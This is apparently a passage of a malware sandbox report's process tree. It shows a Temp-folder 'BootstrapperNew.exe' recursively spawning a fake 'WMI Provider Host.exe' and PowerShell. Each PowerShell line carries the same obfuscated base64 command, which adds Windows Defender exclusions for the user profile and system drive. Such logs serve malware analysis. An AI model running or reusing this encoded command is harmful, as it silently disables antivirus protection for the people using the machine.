        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        90⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        91⤵
        
        PID:5412
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        91⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        91⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        92⤵
        
        PID:6628
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        92⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        92⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        93⤵
        
        PID:6528
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        93⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        93⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        94⤵
        
        PID:5604
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        94⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        94⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        95⤵
        
        PID:2144
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        95⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        95⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        96⤵
        
        PID:4272
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        96⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        96⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        97⤵
        
        PID:6676
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        97⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        97⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        98⤵
        
        PID:6040
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        98⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        98⤵
        
        PID:548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        99⤵
        
        PID:1920
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        99⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        99⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        100⤵
        
        PID:2360
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        100⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        100⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        101⤵
        
        PID:3996
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        101⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        101⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        102⤵
        
        PID:6788
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        102⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        102⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        103⤵
        
        PID:6220
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        103⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        103⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        104⤵
        
        PID:6268
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        104⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        104⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        105⤵
        
        PID:5296
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        105⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        105⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        106⤵
        
        PID:5508
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        106⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        106⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        107⤵
        
        PID:3920
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        107⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        107⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        108⤵
        
        PID:1464
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        108⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        108⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        109⤵
        
        PID:4996
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        109⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        109⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        110⤵
        
        PID:4908
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        110⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        110⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        111⤵
        
        PID:2248
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        111⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        111⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        112⤵
        
        PID:5020
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        112⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        112⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        113⤵
        
        PID:5132
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        113⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        113⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        114⤵
        
        PID:2616
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        114⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        114⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        115⤵
        
        PID:6216
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        115⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        115⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        116⤵
        
        PID:6696
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        116⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        116⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        117⤵
        
        PID:6624
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        117⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        117⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        118⤵
        
        PID:4056
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        118⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        118⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
